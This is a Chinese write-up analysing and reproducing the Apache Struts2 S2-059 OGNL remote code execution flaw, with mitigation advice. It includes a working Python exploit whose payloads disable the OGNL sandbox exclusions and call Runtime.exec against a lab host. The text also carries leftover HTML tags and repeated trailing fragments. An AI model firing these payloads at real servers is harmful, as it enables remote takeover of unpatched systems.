Apache Struts2 S2-059 RCE漏洞分析与复现<\/h1>

漏洞概述<\/h2>
Apache Struts2框架在处理某些标签时，会对标签属性值进行二次表达式解析。当标签属性值使用了类似`%{payload}<\/code>且payload为用户可控时，攻击者可以构造恶意payload参数，通过OGNL表达式执行导致远程代码执行(RCE)。<\/p>`

影响范围<\/h2>

Struts 2.0.0 - Struts 2.5.20<\/li>
<\/ul>
利用条件<\/h2>

开启altSyntax功能（默认开启）<\/li>
标签id属性中存在表达式且可控<\/li>
<\/ol>
前置知识<\/h2>
OGNL表达式<\/h3>
OGNL(Object-Graph Navigation Language)是对象图导航语言，具有以下特点：<\/p>

支持对象方法调用：objName.methodName()<\/code><\/li>
支持类静态方法调用和值访问：@[类全名]@[方法名|值名]<\/code><\/li>
支持赋值操作和表达式串联<\/li>
可以访问OGNL上下文(ActionContext)<\/li>
可以操作集合对象<\/li>
<\/ol>
OGNL关键符号<\/h3>


#<\/code>符号：<\/p>

访问非根元素（相当于ActionContext.getContext()）<\/li>
过滤和投影集合：persons.{?#this.age>28}<\/code><\/li>
构造Map：#{'foo1':'bar1','foo2':'bar2'}<\/code><\/li>
<\/ul>
<\/li>

%<\/code>符号：<\/p>

在标志属性为字符串类型时计算OGNL表达式的值（类似eval）<\/li>
<\/ul>
<\/li>

$<\/code>符号：<\/p>

在国际化资源文件中引用OGNL表达式<\/li>
在Struts2配置文件中引用OGNL表达式<\/li>
<\/ul>
<\/li>
<\/ol>
漏洞复现<\/h2>
测试环境搭建<\/h3>

使用JDK 8u66 + Tomcat 7.0.72 + Struts 2.5.16<\/li>
创建测试项目（代码已上传至Github）<\/li>
<\/ol>
测试代码<\/h3>
S2059.jsp<\/strong>:<\/p>
<%@ page language="java" contentType="text\/html; charset=UTF-8" pageEncoding="UTF-8" %>
<%@ taglib prefix="s" uri="\/struts-tags" %>
<html>
<head>
    <title>S2059<\/title>
<\/head>
<body>
<s:a id="%{id}">SimpleTest<\/s:a>
<\/body>
<\/html>
<\/code><\/pre>
Struts.xml<\/strong>:<\/p>
<?xml version="1.0" encoding="UTF-8" ?><\/span>
<\/span><\/span><!DOCTYPE struts PUBLIC
<\/span><\/span><\/span>        "-\/\/Apache Software Foundation\/\/DTD Struts Configuration 2.0\/\/EN"
<\/span><\/span><\/span>        "http:\/\/struts.apache.org\/dtds\/struts-2.0.dtd"><\/span>
<\/span><\/span><struts><\/span>
<\/span><\/span>    <constant<\/span> name=<\/span>"struts.devMode"<\/span> value=<\/span>"false"<\/span>\/><\/span>
<\/span><\/span>    <package<\/span> name=<\/span>"default"<\/span> namespace=<\/span>"\/"<\/span> extends=<\/span>"struts-default"<\/span>><\/span>
<\/span><\/span>        <default-action-ref<\/span> name=<\/span>"index"<\/span>\/><\/span>
<\/span><\/span>        <action<\/span> name=<\/span>"S2059"<\/span> class=<\/span>"org.heptagram.action.IndexAction"<\/span> method=<\/span>"Test"<\/span>><\/span>
<\/span><\/span>            <result><\/span>S2059.jsp<\/result><\/span>
<\/span><\/span>        <\/action><\/span>
<\/span><\/span>    <\/package><\/span>
<\/span><\/span><\/struts><\/span>
<\/span><\/span><\/code><\/pre>IndexAction.java<\/strong>:<\/p>
package<\/span> org.heptagram.action;<\/span>
<\/span><\/span>
<\/span><\/span>import<\/span> com.opensymphony.xwork2.ActionSupport;<\/span>
<\/span><\/span>
<\/span><\/span>public<\/span> class<\/span> IndexAction<\/span> extends<\/span> ActionSupport {<\/span>
<\/span><\/span>    private<\/span> String id;<\/span>
<\/span><\/span>    
<\/span><\/span>    public<\/span> String getId<\/span>()<\/span> {<\/span> return<\/span> id;<\/span> }<\/span>
<\/span><\/span>    public<\/span> void<\/span> setId<\/span>(<\/span>String id)<\/span> {<\/span> this<\/span>.<\/span>id<\/span> =<\/span> id;<\/span> }<\/span>
<\/span><\/span>    public<\/span> String Test<\/span>()<\/span> {<\/span> return<\/span> SUCCESS;<\/span> }<\/span>
<\/span><\/span>}<\/span>
<\/span><\/span><\/code><\/pre>简易测试<\/h3>
访问URL并提交id参数：<\/p>
http:\/\/192.168.174.148:8080\/SimpleStruts_war_exploded\/S2059?id=1
<\/code><\/pre>
构造恶意payload：<\/p>
http:\/\/192.168.174.148:8080\/SimpleStruts_war_exploded\/S2059?id=%25{8*8}
<\/code><\/pre>
EXP测试<\/h3>
import<\/span> requests
<\/span><\/span>
<\/span><\/span>url =<\/span> "http:\/\/192.168.174.148:8080\/SimpleStruts_war_exploded\/S2059"<\/span>
<\/span><\/span>
<\/span><\/span># 第一步：绕过沙盒限制<\/span>
<\/span><\/span>data1 =<\/span> {
<\/span><\/span>    "id"<\/span>: "%{(#context=#attr['struts.valueStack'].context).(#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.setExcludedClasses('')).(#ognlUtil.setExcludedPackageNames(''))}"<\/span>
<\/span><\/span>}
<\/span><\/span>
<\/span><\/span># 第二步：执行命令<\/span>
<\/span><\/span>data2 =<\/span> {
<\/span><\/span>    "id"<\/span>: "%{(#context=#attr['struts.valueStack'].context).(#context.setMemberAccess(@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS)).(@java.lang.Runtime@getRuntime().exec('calc.exe'))}"<\/span>
<\/span><\/span>}
<\/span><\/span>
<\/span><\/span>res1 =<\/span> requests.<\/span>post(url, data=<\/span>data1)
<\/span><\/span>res2 =<\/span> requests.<\/span>post(url, data=<\/span>data2)
<\/span><\/span><\/code><\/pre>漏洞分析<\/h2>
漏洞触发流程<\/h3>

标签解析入口<\/strong>：org.apache.struts2.views.jsp.ComponentTagSupport<\/code>的doStartTag<\/code>方法处理标签解析<\/li>
获取值栈信息<\/strong>：通过this.getStack()<\/code>获取值栈<\/li>
创建Anchor对象<\/strong>：通过this.getBean<\/code>创建并注入ActionContext.container<\/code><\/li>
参数赋值操作<\/strong>：调用this.populateParams()<\/code>进行标签属性赋值<\/li>
表达式解析<\/strong>：

第一次解析：在findString<\/code>方法中解析%{id}<\/code><\/li>
第二次解析：在evaluateParams<\/code>方法中通过populateComponentHtmlId<\/code>再次解析表达式<\/li>
<\/ul>
<\/li>
<\/ol>
关键点分析<\/h3>


双重解析机制<\/strong>：<\/p>

第一次解析将%{id}<\/code>解析为%{8*8}<\/code><\/li>
第二次解析将%{8*8}<\/code>解析为64<\/code>，导致表达式执行<\/li>
<\/ul>
<\/li>

maxLoopCount限制<\/strong>：<\/p>

表达式解析有最大循环次数限制，每次只能解析一层<\/li>
通过两次独立的解析过程绕过此限制<\/li>
<\/ul>
<\/li>

altSyntax功能<\/strong>：<\/p>

默认开启，允许使用%{}<\/code>语法<\/li>
是漏洞触发的必要条件<\/li>
<\/ul>
<\/li>
<\/ol>
安全建议<\/h2>

升级到Struts最新版本<\/li>
检查并限制用户输入的OGNL表达式<\/li>
关闭不必要的altSyntax功能<\/li>
<\/ol>
参考链接<\/h2>

Apache官方公告<\/a><\/li>
漏洞分析文章<\/a><\/li>
Vulhub复现环境<\/a><\/li>
<\/ol>

Apache Struts2 S2-059 RCE漏洞分析与复现<\/h1>

前置知识<\/h2>

漏洞复现<\/h2>

漏洞分析<\/h2>

安全建议<\/h2> 升级到Struts最新版本<\/li> 检查并限制用户输入的OGNL表达式<\/li> 关闭不必要的altSyntax功能<\/li> <\/ol> 参考链接<\/h2> Apache官方公告<\/a><\/li> 漏洞分析文章<\/a><\/li> Vulhub复现环境<\/a><\/li> <\/ol>

参考链接<\/h2> Apache官方公告<\/a><\/li> 漏洞分析文章<\/a><\/li> Vulhub复现环境<\/a><\/li> <\/ol>

安全建议<\/h2>

升级到Struts最新版本<\/li>
检查并限制用户输入的OGNL表达式<\/li>
关闭不必要的altSyntax功能<\/li> <\/ol>
参考链接<\/h2>

Apache官方公告<\/a><\/li>
漏洞分析文章<\/a><\/li>
Vulhub复现环境<\/a><\/li> <\/ol>

参考链接<\/h2>

Apache官方公告<\/a><\/li>
漏洞分析文章<\/a><\/li>
Vulhub复现环境<\/a><\/li> <\/ol>